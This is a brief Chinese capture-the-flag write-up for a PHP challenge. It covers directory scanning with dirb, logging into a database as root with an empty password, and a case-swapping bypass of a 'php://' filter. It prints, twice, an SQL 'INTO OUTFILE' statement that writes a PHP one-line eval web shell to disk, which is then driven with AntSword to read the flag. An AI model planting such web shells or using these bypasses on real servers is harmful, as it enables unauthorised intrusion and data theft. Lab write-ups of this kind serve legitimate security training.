打开靶场地址,我们看到是一个php代码
我们首先利用kali虚拟机内的dirb,获取敏感信息,扫描网站敏感文件
扫描可以得出该网站下的文件,我将它复制在记事本中
发现一个数据库网站
获取到账号为root密码为空
登录数据库,在SQL出编写一句话木马,并执行。
SELECT "<?php eval(@$_POST['pass']); ?>"
INTO OUTFILE '/tmp/test1.php'
接下来我们使用中国蚁剑,链接我们所编写的木马,
SELECT "<?php eval(@$_POST['pass']); ?>"
INTO OUTFILE '/tmp/test1.php'
//红色字体为链接密码,绿色字体为木马文件路径。
链接成功后,我们可以直接在蚁剑中,查看该数据库中的文件,发现flag
第二种方法:
根据题目源代码可知 过滤了 php:// 大小写绕过呗
构造 payload,抓包
在数据包中添加一个PHP的函数
然后cat flag那个文件,查看内容:
拿到flg............